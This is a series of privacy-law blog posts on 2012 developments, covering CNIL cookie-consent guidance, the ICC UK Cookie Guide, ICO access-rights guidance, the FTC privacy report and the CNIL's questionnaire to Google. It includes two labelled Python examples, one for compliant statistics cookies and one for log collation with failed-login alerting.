The French CNIL has released an amended version of its guidance regarding the implementation of the “Telecoms Package” concerning the use of cookies.

As set forth by the 24 August 2011 Ordinance, user consent is in principle required prior to the placement of cookies on an individual’s computer.

Until the revision of its guidance, the CNIL had mentioned a few exceptions to the obligation to obtain the user’s prior consent for the following cookies:

  • Cookies utilized for carts on a merchant website
  • SessionID cookies
  • Cookies having the sole objective of contributing to the security of the IT service for the user
  • Cookies allowing the language spoken by the user to be identified (if applicable)
  • Flash cookies containing elements that are necessary for the use of a media player if the user wants to have access to a content requiring such elements

The CNIL has now, in revising its guidance, added statistics cookies to this list: the CNIL considers that website traffic statistics are necessary to the business, and that such statistics should also make it possible to identify the popularity of the content that is posted.

As a result, and given the "very limited risk on the protection of privacy", the CNIL decided that such statistics cookies should also be exempted from any prior consent.

Nevertheless, the CNIL outlined several conditions to this additional exemption:

  • As with the other exempted cookies, the editor will need to inform the user of the placement of such cookies. The CNIL foresees that the website’s home page shall display a link giving direct access to such information, which would be contained in the terms and conditions of use.
  • The user shall be able to exercise his/her right of access…
  • … as well as his/her right to oppose. Concerning this right, the tool that will deactivate the functionality should be easily accessible and easy to install on any device (including smart phones). Further, no information concerning the users having used this tool shall be transmitted to the tool's editor.
  • The purpose of the system needs to be limited to statistics. No interconnection with other functionalities shall be possible. The generated statistics shall only be produced on an anonymous basis. These statistics shall not be used for different editors at the same time - i.e. only for one editor at once.
  • The IP address shall not allow a geolocation more precise than the user’s town
  • The retention period for cookies shall not be longer than six months
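
As an added illustration (not CNIL code, nor any analytics vendor's), the following Python shows how a site's own statistics cookie could be handled under the conditions above: the cookie lifetime is capped at six months (taken as 183 days, an assumption), client addresses are coarsened before storage (zeroing the host part is assumed to be coarse enough for "town" level, which is the editor's choice rather than a rule in the guidance), opted-out visitors are neither counted nor reported, and only aggregate figures for a single editor leave the store. The names `site_stats`, `anonymise_ip`, `cookie_retention_ok` and `StatisticsStore` are made up for the example.

```python
"""Helpers modelled on the CNIL conditions for exempted statistics cookies.

Added example, not CNIL or vendor code. Assumptions: "six months" is read as
183 days, and "no finer than the town" is approximated by zeroing the host
part of the address (last IPv4 octet, last 80 bits of an IPv6 address).
"""
import hashlib
import hmac
import ipaddress
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime
from http.cookies import CookieError, SimpleCookie

MAX_RETENTION = timedelta(days=183)   # assumed reading of "six months"
COOKIE_NAME = "site_stats"            # constructed cookie name


def build_stats_cookie(visitor_token: str, lifetime: timedelta = MAX_RETENTION) -> str:
    """Return a Set-Cookie header value whose Max-Age never exceeds MAX_RETENTION."""
    lifetime = min(lifetime, MAX_RETENTION)   # clamp, never extend
    cookie = SimpleCookie()
    cookie[COOKIE_NAME] = visitor_token
    cookie[COOKIE_NAME]["max-age"] = int(lifetime.total_seconds())
    cookie[COOKIE_NAME]["path"] = "/"
    return cookie[COOKIE_NAME].OutputString()


def cookie_retention_ok(set_cookie: str, now: datetime) -> bool:
    """Check a Set-Cookie header against the retention limit.

    Max-Age (seconds) and Expires (HTTP date) are both checked; a cookie with
    neither is a session cookie and is within the limit. Unparseable values
    fail closed.
    """
    cookie = SimpleCookie()
    try:
        cookie.load(set_cookie)
    except CookieError:
        return False
    for morsel in cookie.values():
        if morsel["max-age"]:
            try:
                if timedelta(seconds=int(morsel["max-age"])) > MAX_RETENTION:
                    return False
            except ValueError:
                return False
        if morsel["expires"]:
            try:
                expires = parsedate_to_datetime(morsel["expires"])
            except (TypeError, ValueError):
                return False
            if expires.tzinfo is None:            # treat naive dates as UTC
                expires = expires.replace(tzinfo=timezone.utc)
            if expires - now > MAX_RETENTION:
                return False
    return True


def anonymise_ip(ip: str) -> str:
    """Coarsen a client address before it is stored (assumed town-level proxy)."""
    addr = ipaddress.ip_address(ip)
    prefix = 24 if addr.version == 4 else 48
    network = ipaddress.ip_network(f"{addr}/{prefix}", strict=False)
    return str(network.network_address)


class StatisticsStore:
    """Anonymous page-view counts kept for exactly one editor.

    The visitor token is only used, keyed-hashed, to count distinct visitors
    per page; raw tokens and raw addresses are never stored. Visitors who used
    the opt-out tool are not recorded and nothing about them is transmitted.
    """

    def __init__(self, editor_id: str, secret: bytes):
        self.editor_id = editor_id          # one editor per store, never shared
        self._secret = secret               # per-editor key for the token hash
        self._page_views = Counter()        # path -> hits
        self._networks = Counter()          # coarsened network -> hits
        self._visitors = defaultdict(set)   # path -> hashed visitor tokens

    def record_hit(self, path: str, visitor_token: str, client_ip: str,
                   opted_out: bool) -> bool:
        """Count one page view; returns False when the hit was discarded."""
        if opted_out:
            return False                    # nothing stored, nothing sent on
        digest = hmac.new(self._secret, visitor_token.encode(),
                          hashlib.sha256).hexdigest()
        self._page_views[path] += 1
        self._networks[anonymise_ip(client_ip)] += 1
        self._visitors[path].add(digest)
        return True

    def report(self) -> dict:
        """Aggregate figures only: no token, raw address or timestamp leaves the store."""
        return {
            "editor": self.editor_id,
            "page_views": dict(self._page_views),
            "unique_visitors": {p: len(v) for p, v in self._visitors.items()},
            "networks": dict(self._networks),
        }
```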

The CNIL added that its position is subject to the future position of the Working Party 29.

Moreover, the revised version of the guidance provides some clarification as to cookies that do not contain personal data: these are per se considered by the CNIL (and the Working Party 29) as subject to the regulation.

The CNIL finally provides additional guidance as to the procedure to be put in place in order to obtain the user’s consent.

The ICC publishes its 'UK Cookie Guide' on 2 April 2012 to provide guidance to website operators and website users alike.

This post was written by Cynthia O'Donoghue.

On 2 April, 2012, after almost a year of preparation, the International Chamber of Commerce UK (“ICC”) launched its UK Cookie Guide designed to help website operators and website users comply with new EU rules on the use of cookies. The ICC hopes that if the Guide becomes widely adopted by website operators, then users will be exposed to consistent information regarding cookies, will become familiar with the various types of cookies on websites, and will develop an understanding of the different categories of cookies.

Part 1 of the Guide provides guidance for website operators in relation to the content and information contained within the rest of the Guide. Part 1 is intended to provide information to website users in layers, allowing users to access as much or as little information as they want regarding cookies, with the initial layer designed to be simple and straightforward. Part 1 details that the Guide can be used by website operators to educate their users and can make it easier to gain their consent by giving users consistent information across different websites. The Guide is intended to make it easier for users to access information about cookies and be in an informed position to give their consent. Part 1 also touches upon the idea of "browser-based compliance," and the use of icons linked to mechanisms of control so that the user can click on the icons to find out more information.

Part 2 of the Guide puts cookies into four categories based on their functions and what they are used for. The Guide points out that these categories are not definitive and there may be cookies that do not fit. Furthermore, the categories are designed to evolve as more cookies are discovered. Where a cookie does not fit, website operators will have to devise their own wording and consent approach. The Guide identifies the four categories as:

  1. Strictly necessary cookies
  2. Performance cookies
  3. Functionality cookies
  4. Targeting or advertising cookies

Part 2 of the Guide includes a case study describing what a cookie is and gives tips and guidance for website operators on how to approach each category, and how to explain clearly what each category of cookie is used for.

Part 3 of the Guide focuses on technical notes and definitions of the four categories of cookies, giving examples of when the cookies are used and the information that the cookie collects. For example, Category 1 strictly necessary cookies are “essential first-party session cookies” and will generally be used to store a unique identifier to manage and identify the user in order to provide a consistent and accurate service. Category 1 cookies will remember previous actions or text and will manage, pass and maintain security tokens (i.e., identify whether the user is logged in). However, these cookies will not be used for marketing or to remember preferences outside of a single session.

Part 4 of the Guide gives some examples that can be used by website operators to obtain users’ consent to the use of cookies falling within the four categories set out in Part 2. The Guide states that website operators should also provide for withdrawal of consent previously given by users, although there is no prescribed form or examples given in the Guide for this. The Guide states that, for Category 1 cookies, no consent is required because these are strictly necessary cookies. For Category 2 cookies, which only collect information about website usage for the benefit of the website operator, consent can be obtained in the terms and conditions of the site or when the user changes the settings, but this will depend on the kind of website and the precise function of the cookies. For Category 4 cookies, which collect the most information about the user, it is important to obtain clear and informed consent from the user for their use as the party setting the cookie is required by law to do, although in practice the website operator may be better placed to obtain the consent. Guidance given by the UK Information Commissioner’s office, which has welcomed the launch of the ICC’s Guide, states that each party must play its part in obtaining the consent, although it is up to the individual parties to decide the most appropriate method, depending on the purpose of the cookie, so long as the user is given a clear and informed choice.

The ICO Issues New Guidance on Access Rights and Data Controllers

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner’s Office (“ICO”) released recommendations advising organisations to ensure that the data held regarding individuals is thoroughly and securely searchable so they can meet their obligations under the Data Protection Act 1998 (“DPA”). The ICO also clarified when companies can be classified as data controllers. The recommendations came through three sets of guidance issued by the ICO at the end of March 2012.

The right of access under the DPA places a general obligation on organisations in control of an individual’s personal data (data controllers) to provide that individual with a copy of the data in an “intelligible form” upon receiving a written request. Data controllers have been exempted from the obligation to provide a copy when it is not possible or would involve “disproportionate effort" under section 8(2) of the DPA. The ICO believes that too many organisations have relied too heavily on this exemption and have failed to provide access at all, prompting the ICO to clarify the requirement.

The ICO guidance makes it clear that the section 8(2) qualification applies only in respect of supplying a copy of the relevant information to the individual, and is not a basis for a data controller to refuse to respond to an individual’s access request when locating the information would take considerable effort or expense. The ICO expects organisations to have procedures to allow searches of “live” computer systems in anticipation of subject access requests, including situations where supplying a copy of the information to the individual would require “disproportionate effort,” as an organisation will still be obliged to comply with the request in another way. Even where the effort may be “disproportionate,” good practice dictates that organisations must search for records stored in stand-alone, as well as networked, computers, and take “reasonable steps” to look for personal data stored in archived systems in addition to searching manual records and emails.

Data controllers are expected to have procedures in place for searching records on their “live” computer system, as well as “clear policies” on how the system searches and retrieves archived data. Where electronic data has been deleted, the ICO will not usually require an organisation to reconstitute data that has been disposed of in accordance with retention and deletion policies. Companies should have evidence of proper procedures, as this may assist a data controller in persuading the ICO that it has not deleted data with the intention of preventing disclosure. The full guidance on Disproportionate Effort can be found here.

In separate guidance related to access requests, the ICO stated that the exemption under section 31 of the DPA (relating to regulatory activities) applies only to regulatory bodies such as Ombudsmen, the FSA and the IPCC. Full details of the guidance in relation to Regulatory Activity can be found here.

The third guidance note issued by the ICO addresses the distinction between the classifications of data processors and data controllers under the DPA, although the ICO comments that in many cases, deciding who is a data controller and who is a data processor is not clear-cut, and there will often be differences of interpretation. The ICO states that when determining whether a party involved in the processing of personal data is a data controller, consideration should be given to the degree of independence that each party has in relation to how and in what manner the data is processed. The guidance explains that, broadly speaking, in a “simple data controller/data processor relationship” – where the client instructs another party to carry out processing of personal data on its behalf and the service provided is straightforward – the client will be the data controller. The service provider that simply follows instructions and has “little or no flexibility” in providing the service is a data processor. The guidance goes on to detail specific and more complex situations in which determining who plays which part becomes more difficult. The full document can be found here.

Reed Smith hosts seminar on "Taming the e-Beast: What you need to know about Records Management, Data Protection and E-Disclosure in this Electronic Age"

This post was written by Cynthia O'Donoghue, David Cohen and Rosanne Kay.

Reed Smith hosted a seminar in its London office to discuss issues companies face arising from poor Records Management, Data Protection, E-Disclosure and the Proposed EU General Data Protection Regulation. Speakers included the UK Information Commissioner’s Office Head of Strategic Liaison, Jonathan Bamford, and Reed Smith London Partners Cynthia O’Donoghue and Rosanne Kay, and Pittsburgh Partner David Cohen.

In the first session, Cynthia and David addressed the issue of poor records management and how companies can take steps to improve their approach to record keeping in the Electronic Age. They commented that the volume of documentation being stored by companies is becoming increasingly difficult to manage because of emails and documents being kept for too long a period. Companies face conflicting duties of requiring a good retention policy and being prepared for litigation, at the same time as complying with data privacy principles which state that information should not be kept for longer than necessary. Companies are often saving records beyond the point where they have any useful purpose, such as emails that tend to have a lifespan of only six months, and companies can suffer from poor employee productivity when employees spend inordinate amounts of time looking for documents. The speakers advised clients to adopt a ‘six-step action plan’ to address these issues and strike a balance between the different business needs, legal considerations, and data privacy concerns, to create a workable, appropriate retention policy.

Jonathan Bamford gave a presentation on the ICO’s perspective on the EU Data Protection Regulation and Directive. The ICO is seeking a clear, easy-to-understand set of rules containing effective requirements that are both simple to exercise and low cost. The ICO wants accountability and responsibility throughout the information life cycle, and a provision which allows organisations that are compliant with the regulations to “get ahead”. He stated that the ICO welcomed certain aspects of the regulations, including:

  • Improved rights for individuals
  • A higher standard of consent – in the new draft regulations, consent must be explicit and can be withdrawn
  • Incorporation of new concepts such as Privacy by Design
  • Stronger supervisory authorities
  • More consistency across the EU – one set of regulations across all 27 member states and “one-stop-shop” complaints' procedures

Jonathan explained that some changes in the proposed framework were less welcome by the ICO, including:

  • Having a separate Regulation and Directive as the two instruments could cause confusion, because the Directive seems to have a lower standard of protection
  • The overly prescriptive nature of the proposed Regulation
  • The lack of focus on privacy risk – the UK’s current Data Protection Act and associated measures put privacy risk at the forefront
  • An outdated approach to international data transfers
  • A “one size fits all” approach towards sensitive data without considering the context and risk

He also expressed doubts regarding some concepts raised in the proposals, stating that the Right to be Forgotten will be very difficult to enforce, and that the potential workload that will be placed on supervisory authorities is almost unworkable. He echoed the view expressed in the ICO’s initial opinion stating that the published opinion will not be the ICO’s last word on the draft EU Regulations.

The last session of the seminar covered E-Disclosure and Cross-Border issues. David Cohen and Rosanne Kay discussed the various issues that arise with e-disclosure/discovery in litigation in both the UK and the US. Electronic documents have taken on a large significance in litigation in recent years because they contain a lot of information, are easy to search using keyword terms, are difficult to destroy, and can be difficult to locate and preserve. New technologies, such as ‘concept searching’ and ‘e-mail threading’, are emerging to aid document reviews. David highlighted an emerging trend in the United States, where sanctions have been imposed on parties for e-discovery mistakes.

Cynthia then discussed conflicting laws between the EU and US on cross-border discovery stemming from the international data transfer bar contained in the EU Data Protection Directive, and some European countries’ blocking statutes. Because of the broad definitions of ‘personal data’ and ‘processing’, any US discovery seeking documents from organizations located in Europe will be caught by national data protection laws so that a transfer of data to the United States has the potential to violate national data protection laws. Cynthia discussed recent trends such as the Sedona Conference Working Group 6 principles on transfers and the new American Bar Association’s decision urging US courts to give ‘due respect’ to foreign data protection and privacy, and the International Chamber of Commerce policy statement on “Cross-border law enforcement access to company data – current issues under data protection and privacy law”. The statement makes recommendations that can help to ensure respect for both law enforcement interests, and data protection and privacy laws.

Compatibility and shared principles take centre stage at the EU Conference on privacy and protection of personal data held in Washington, D.C. and Brussels

This post was written by Cynthia O'Donoghue.

A joint US-EU Conference on Privacy and Protection of Personal Data took place in Washington, D.C. and Brussels in March and coincided with the release of a joint US-EU Privacy Statement.

Keynote speeches were delivered by Viviane Reding, the Vice-President of the European Commission; US Congressman Ed Markey (D-Mass.); and Julie Brill, Commissioner of the FTC. Each of the keynote speakers welcomed the cooperation between the EU and the US, and the potential to work together toward common standards.

Viviane Reding stated that solid protection was needed to gain user trust for a digital economy to flourish. She welcomed US activity in the area of data privacy, as there was potential for the EU and the US to work together on a “Gold Standard”, which would support the joint commitment made by President Obama and EU President Barroso during the November 2011 EU-US Summit.

Rep. Markey felt the US could learn a lot from the EU given that US citizens have the same concerns as EU citizens when it comes to data privacy, and that privacy and data protection are based on a key principle of “Knowledge, Notice and No” – people want to know what is happening, and they want options for control and the ability to say “no”. He believes that consumers should have control over their personal information. While the proposed EU Regulation sets a high bar for the US, Rep. Markey felt this was the right model for the US to follow. Rep. Markey highlighted the problems with online behavioural advertising, the risks to children, and the reasons for his introduction of the “Do Not Track Kids Act”.

Julie Brill urged the US and the EU to “shape the future of privacy”, and to focus on similarly based principles and underlying compatibility of their respective frameworks, such as providing effective tools for consumers and giving users access to data which is accurate and secure. She commented that the FTC is committed to “enforcement across borders” and noted that the FTC consent-orders relating to Google and Facebook protect users worldwide.

The discussions highlighted the differences in approach between the EU and the US, with EU’s draft Regulation seeking to create a single system across 27 member states which would cut red tape, reduce fragmentation and be good for business, and which had a common goal with the White House’s Consumer Privacy Bill of Rights, which seeks to also build on an existing framework. Most speakers agreed that there was little disagreement between the EU and US in relation to basic values, and David Vladeck of the FTC felt that Privacy by Design should be a basic pillar of both EU and US policy.

Baroness Sarah Ludford, a member of the EU Parliament, commented that the safe harbor framework was a good basis for increasing trust for transfers of data from the EU to US, and she was optimistic about developments between the US and the EU and the key similarities in proposed regulations even if the mechanisms are different. In the future, she hoped to see an umbrella agreement between the US and the EU which would provide a stable, permanent framework.

The recurring theme of the discussions was how far the EU and the US had come, and that the focus should be on common shared points rather than on differences. Interoperability was mentioned frequently by a number of participants, as well as the idea of harmonisation and global, flexible regulation. Speakers felt the EU and the US should work towards elements such as common principles, common implementation and common enforcement, including the imposition of high sanctions and fines which are vital to successful enforcement.

The US-EU Joint Statement on Privacy seeks to work towards a consensus on how to address emerging privacy issues in line with the objectives of increasing trade and regulatory cooperation, and the US and EU each reaffirmed their commitment to the US-EU Safe Harbor Framework.

A full programme of the conference can be found here.

Log File Management & Retention Programs: Put the Systems in Place to Turn Static Logs into Active Real-Time Intelligence

Firewall, server and application log alerts can be used as real-time intelligence, but these alerts often go ignored. Even if some log alerts are investigated, many organizations often are unaware of the information they retain and how logs may be mined in the event of a data breach. It's a privacy and security sin, but it is understandable given the vast trove of logs available to most enterprise organizations. So, why should your organization care about log files? Because they are essential warning tools and ultimate evidence in the event of a data breach. Hackers and inside intruders leave their fingerprints all over log files. Piecing together these bits of evidence in real-time can help your organization detect preliminary intrusions and, if the big breach does occur, quickly understand the universe of information available for your IT forensics teams.

In the event of a data breach, law enforcement, regulators, payment card auditors, clients and others will ask about your log file management and your alerting protocols. Don't be caught unaware.

To develop an appropriate log file management program, companies should: (1) craft written policies for logging, auditing, and handling logs; (2) employ tools to collate, index, and normalize logs for analysis; (3) define and generate alerts and actions for critical events (without over-alerting and desensitizing staff); and (4) set discernible metrics for management review. The goal of this process is to retain sufficient data for the investigatory process in the event of a data security breach, and then to purge stale log file data in accordance with the organization's data privacy mandates. Understanding your log file program for critical systems, network components and virtualized environments is a must. Then, you must communicate the log file program to key business owners, so they understand any limitations of your existing systems and support technology improvements, if they are necessary. Reed Smith recently hosted a series of meetings on this topic in its Washington, D.C., New York, Pittsburgh and Philadelphia offices with the CISO Executive Network, entitled, “Security Operations with a special focus on Event and Log Management.” Please click here for a recorded video conference of Amy Mushahwar presenting to the Washington, D.C. CISO Executive Network.
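The four steps above (normalize, collate and index, alert on critical events without flooding staff, report metrics and purge stale data) are easier to evaluate when seen as one pipeline. The following is an added example written for this post, not code from the original article or from Reed Smith: it takes constructed firewall, web server and application log lines, maps them to one common schema, raises a single throttled alert for a burst of authentication failures from one source address, produces a small metrics summary for management review, and drops events older than a retention period. The log formats, field names, threshold, window and retention period are all assumptions chosen for illustration.

```python
"""Added example (not from the original post): collate, normalise, alert,
report and purge log events in the shape of the four-step programme above.
All formats, sample lines and thresholds are constructed assumptions."""
import json
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

# Constructed sample lines in three native formats (firewall, web server,
# application), as a collector would receive them from different sources.
RAW_LOGS = [
    "2024-05-01T10:00:00Z fw01 DENY src=203.0.113.7 dst=10.0.0.5 dport=22",
    '2024-05-01T10:00:05Z web01 203.0.113.7 "POST /login" 401',
    '2024-05-01T10:00:06Z web01 203.0.113.7 "POST /login" 401',
    "2024-05-01T10:00:07Z app01 AUTH_FAIL user=alice ip=203.0.113.7",
    "2024-05-01T10:00:08Z app01 AUTH_FAIL user=alice ip=203.0.113.7",
    "2024-05-01T10:00:09Z app01 AUTH_FAIL user=alice ip=203.0.113.7",
    "2024-05-01T10:00:30Z app01 AUTH_OK user=bob ip=198.51.100.4",
    "2023-10-01T09:00:00Z app01 AUTH_OK user=carol ip=198.51.100.9",  # stale
]

# One parser per source format (assumed formats); every parser emits the same
# normalised schema so later stages never need to know which device wrote it.
FW_RE = re.compile(r"^(\S+) (\S+) (ALLOW|DENY) src=(\S+) dst=\S+ dport=(\d+)$")
WEB_RE = re.compile(r'^(\S+) (\S+) (\S+) "(\w+) (\S+)" (\d{3})$')
APP_RE = re.compile(r"^(\S+) (\S+) (AUTH_FAIL|AUTH_OK) user=(\S+) ip=(\S+)$")

# Policy values (assumptions): alert on 5 auth failures from one IP within
# 5 minutes, keep events for 90 days.
FAIL_THRESHOLD = 5
WINDOW = timedelta(minutes=5)
RETENTION = timedelta(days=90)
EXAMPLE_NOW = datetime(2024, 5, 1, 12, tzinfo=timezone.utc)  # "current" time


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def normalise(line):
    """Map one raw line to {ts, host, event, src_ip, user}; None if unparseable."""
    m = FW_RE.match(line)
    if m:
        ts, host, action, src, _port = m.groups()
        return {"ts": _ts(ts), "host": host, "event": "fw_" + action.lower(),
                "src_ip": src, "user": None}
    m = WEB_RE.match(line)
    if m:
        ts, host, src, _method, _path, status = m.groups()
        event = "auth_fail" if status == "401" else "http_" + status
        return {"ts": _ts(ts), "host": host, "event": event, "src_ip": src, "user": None}
    m = APP_RE.match(line)
    if m:
        ts, host, result, user, src = m.groups()
        event = "auth_fail" if result == "AUTH_FAIL" else "auth_ok"
        return {"ts": _ts(ts), "host": host, "event": event, "src_ip": src, "user": user}
    return None  # unknown format: a real pipeline would count these, not drop silently


def collate(lines):
    """Normalise every line and index the events by host and by source IP."""
    events = [e for e in (normalise(l) for l in lines) if e]
    by_host, by_ip = defaultdict(list), defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
        by_ip[e["src_ip"]].append(e)
    return events, by_host, by_ip


def generate_alerts(events):
    """One alert per IP per burst of >= FAIL_THRESHOLD failures inside WINDOW.
    Failures from web01 and app01 count together because they share a schema;
    the whole burst is consumed by one alert so staff are not paged per line."""
    fails = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["event"] == "auth_fail":
            fails[e["src_ip"]].append(e["ts"])
    alerts = []
    for ip, times in fails.items():
        i = 0
        while i < len(times):
            hits = [t for t in times[i:] if t - times[i] <= WINDOW]
            if len(hits) >= FAIL_THRESHOLD:
                alerts.append({"ip": ip, "count": len(hits), "first": times[i],
                               "action": "block_and_investigate"})
                i += len(hits)  # suppress further alerts for this burst
            else:
                i += 1
    return alerts


def metrics(events, alerts):
    """Figures a management review would look at (step 4)."""
    return {"events_per_host": dict(Counter(e["host"] for e in events)),
            "auth_fail_total": sum(e["event"] == "auth_fail" for e in events),
            "alerts": len(alerts)}


def purge(events, now):
    """Keep only events inside the retention window."""
    return [e for e in events if now - e["ts"] <= RETENTION]


def run(lines, now=EXAMPLE_NOW):
    events, _by_host, _by_ip = collate(lines)
    alerts = generate_alerts(events)
    return {"alerts": alerts, "metrics": metrics(events, alerts),
            "retained": purge(events, now)}


if __name__ == "__main__":
    result = run(RAW_LOGS)
    print(json.dumps(result["metrics"]))
    for a in result["alerts"]:
        print("ALERT", a["ip"], a["count"], "failures since", a["first"].isoformat())
    print(len(result["retained"]), "events retained after purge")
```

On the constructed input the two web server 401s and three application AUTH_FAIL lines from the same address fall inside one five-minute window, so a single alert is raised rather than five, and the one event older than the retention period is purged while the seven recent ones are kept.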
 

FTC Issues Final Commission Report on Consumer Privacy: Agency Calls on Companies to Develop Privacy Best Practices

This post was written by Paul Bond, Christopher G. Cwalina, Amy S. Mushahwar, Frederick Lah, and Christine E. Nielsen.

This week, the Federal Trade Commission (FTC) released its long-awaited final Commission Consumer Privacy Report, entitled “Protecting Consumer Privacy in an Era of Rapid Change” (“Final Report”). The FTC emphasizes that the report only sets forth industry best practices and was “not intended” to serve as a new template for enforcement. However, this line is not exactly clear as the FTC identifies existing law and enforcement actions that form the basis of its advice (and could be the basis for Section 5 enforcement actions).

The Final Report expands on a preliminary FTC staff report issued in December 2010 and is consistent with the Department of Commerce’s (DOC) parallel privacy initiative. The Final Report calls on companies to do the following:

  • Engage in Privacy by Design: Companies should build in privacy protections – including data security, data minimization, focused data retention and data hygiene – at every stage in product development (from conceptualization to end-of-lifecycle).
  • Provide Simplified Choice: Companies should give consumers the ability to make choices about their data collection and use “at a relevant time and context,” including developing more automated choice functions like a “Do Not Track” mechanism.
  • Exhibit Greater Transparency: Companies should make their data practices more “consumer friendly” and accessible by streamlining privacy policies, providing consumers with access to data collected about them, and engaging in consumer education campaigns to promote information-age literacy.

The framework applies to all businesses that collect or use consumer data that can be “reasonably linked to a specific consumer, computer, or other device, unless the entity collects only non sensitive data from fewer than 5,000 consumers per year and does not share the data with third parties.” Notably, the framework also applies to offline or paper data. Data that has been de-identified is exempt.

The FTC also calls on Congress to develop baseline privacy legislation. To this end, FTC Chairman Jon Leibowitz and the DOC will be testifying Thursday, March 29, 2012, before the House Energy and Commerce Subcommittee on Commerce, Manufacturing and Trade to advance the legislative agenda. The hearing notice and Committee background memo are available here.

Over the next year, the FTC will focus on encouraging voluntary adoption of further privacy protections and be active in five main areas:

  • “Do Not Track” Browser Standard: While the FTC commends the progress made by the Digital Advertising Alliance (DAA) in developing an icon-based system for self-regulation of the online advertising industry, they say that more work needs to be done. The DAA, Internet browser companies, the FTC and the DOC have publicly committed to implementing the existing DAA self-regulatory standard in a browser-based automated privacy tool that will help consumers persistently opt-out of online behavioral advertising and multi-site advertising.
  • Mobile Data: On the heels of the FTC Mobile Children’s Privacy Report, the FTC continues to urge all companies offering mobile services to improve privacy disclosures. In that vein, the FTC will host a web-disclosure workshop including some mobile privacy discussions May 30, 2012, to address how mobile privacy disclosures may be streamlined for mobile screen viewing.
  • Data Brokers Disclosure & Consumer Data Access: The FTC asks data brokers (those collecting information on consumers where they do not have a consumer-facing relationship) to create a centralized website where they would: (1) identify themselves to consumers and describe how they collect and use consumer data and (2) detail the access rights and data choice they provide with the data that they maintain.
  • Large Platform Providers: The FTC suggested that large platform providers, businesses such as ISPs, operating systems, browsers and social media companies that seek to comprehensively track consumers’ online activities, raise elevated privacy concerns. This heightened concern regarding multi-platform tracking is best exhibited in the FTC’s and state regulators’ concerns regarding the streamlined Google privacy policy. FTC staff intends to host a public workshop on this topic in Q3 of this year.
  • Commerce’s Development of Enforceable Self Regulatory Codes: The DOC is in the process of developing sector-specific codes of conduct. FTC staff has indicated that it will participate in this process, and if strong privacy codes are developed in the Commerce process, the Commission will view adherence to such codes favorably when it is reviewing company practices under a Section 5 action.

Please click here to view additional information from the Reed Smith Teleseminar "FTC Issues Final Commission Report on Consumer Privacy: Agency Calls on Companies to Develop Privacy Best Practices."

Some Follow-Up Thoughts on 'Public Privacy'

This post was written by Mark Melodia, John Hines, and Frederick Lah.

We wanted to follow up on a previous post we wrote about whether there is such a thing as "public privacy" -- the concept that people should be entitled to at least some expectation that their actions, even if done in public, will not be widely publicized on a site like YouTube. We continue to see cases develop in this area, particularly in the law enforcement context.

In the following client alert, we take a closer look at this notion of "public privacy."

CNIL vs. Google, Act II: the CNIL Strikes Back - CNIL sends Google a 12-Page Questionnaire on Google's New Privacy Policy for its Integrated Platform in Order to Verify its Compliance with Applicable European Regulation

This post was written by Daniel Kadar.

Google’s CEO, Larry Page, now belongs to the happy few who enjoy direct and regular contact with the CNIL’s president, Mrs. Falque-Pierrotin: on 19 March he received another letter from the French Data Protection Authority’s president following Google’s decision to launch its new integrated platform on 1 March, despite the CNIL’s strong warning to postpone it.

This platform now integrates, in particular, services such as Google Search, Google+, YouTube, Analytics, DoubleClick, +1, Google Location Services and Google Android-based software.

Pursuant to the CNIL’s announcement, this second letter – which is again publicised on the CNIL’s website – contains a 12-page questionnaire divided into not less than 69 main questions on Google’s new privacy policy.

The CNIL outlines in its cover letter that the questionnaire was elaborated in collaboration with the other European DPAs within the Working Party 29.

Whilst the CNIL previously expressed serious doubts about the compliance of the said policy with the European Data Protection Directive (95/46/CE), questions such as “Please provide the legal basis for the combination of data across different services, with respect to article 7 of the Data Protection Directive (95/46/CE)” (Question No. 32) no longer show such doubts concerning the response.

The CNIL focuses on several issues in its questionnaire:

  • The transition to the new privacy policy, in order to verify how and how many users were informed of it
  • The services proposed as well as the collected data: in both regards, the CNIL asks for a list of the services concerned by the integrated platform, and for the different data categories concerned
  • The purposes of the processing, in particular how “more relevant search results and ads” are provided to the users
  • The new data retention policy
  • The data owner’s rights and consent, which is obviously a major source of concern:
    • How is the “explicit consent” of the users obtained by Google? In particular, did Google request an explicit consent from users having a Google account before the transition?
    • Why did Google remove the opt-out option given to users in its previous privacy policies for the combination of information and for other services in general?
    • How is the opt-in option given to users for personally identifiable information monitored, and which data does such option cover?
    • How is the user’s consent obtained for cookies?
    • How is the user’s right to oppose organized and granted?
    • How can the user opt out from personalized advertising? The CNIL provided a detailed and comprehensive schedule based on the different kinds of personalised ads (deriving from queries, site visits, clicks, etc.) and depending on the user category: passive, non-authenticated and authenticated user. Google is requested to complete this schedule and provide explanations for each kind of personalised ads.
  • The Terms of Service of the new policy: the CNIL asks in particular how these Terms of Service apply to personal data uploaded by users
  • The legitimacy of data connection between services, in which the CNIL directly asks for the legal basis on the grounds of which Google proceeds to such connection (!)
  • The user’s information in general, including concerning the use of mobile android platforms

The CNIL gave Google until 5 April to respond to its questionnaire. The cover letter mentions that the CNIL “encourages” Google “to provide detailed and specific answers to each question”, concluding, not without a strong sense of irony, that Google’s responses will be treated confidentially, unless Google authorizes the CNIL to publicise them…

The length of the CNIL’s questionnaire and the general tone of the questions are strong indicators of the seriousness of the CNIL’s analysis, and of its determination to ensure that the first major “intelligent advertisement” system complies with applicable data privacy regulation.
 

New law regulating Internet Information Service Providers comes into force in China

This post was written by Cynthia O'Donoghue and Zack Dong.

New regulations governing the activities of Internet Information Service Providers (“IISPs”) unveiled by the Chinese Ministry of Industry and Information Technology (“CMIIT”) in December came into force on 15 March. The “Several Provisions on Regulation of the Market Order of Internet Information Services” (“Provisions”) aim to enhance the protections available to Internet users in China in areas such as Internet security, data protection and online advertising.

For a more detailed analysis, please click here.

First Enforcement Action Resulting From a Breach Self-Report Announced by OCR

This post was written by Nancy E. Bonifant and Brad M. Rostolsky.

On March 13, 2012 the Department of Health and Human Services (HHS), Office of Civil Rights (OCR) announced its settlement with Blue Cross Blue Shield of Tennessee (BCBST), marking the first enforcement action resulting from a breach self-report required by HITECH’s Breach Notification Rule.

For a more detailed analysis, please click here.

EU Working Party on Information Exchange and Data Protection gives its first consideration of the General Data Protection Regulation and Directive

This post was written by Cynthia O'Donoghue.

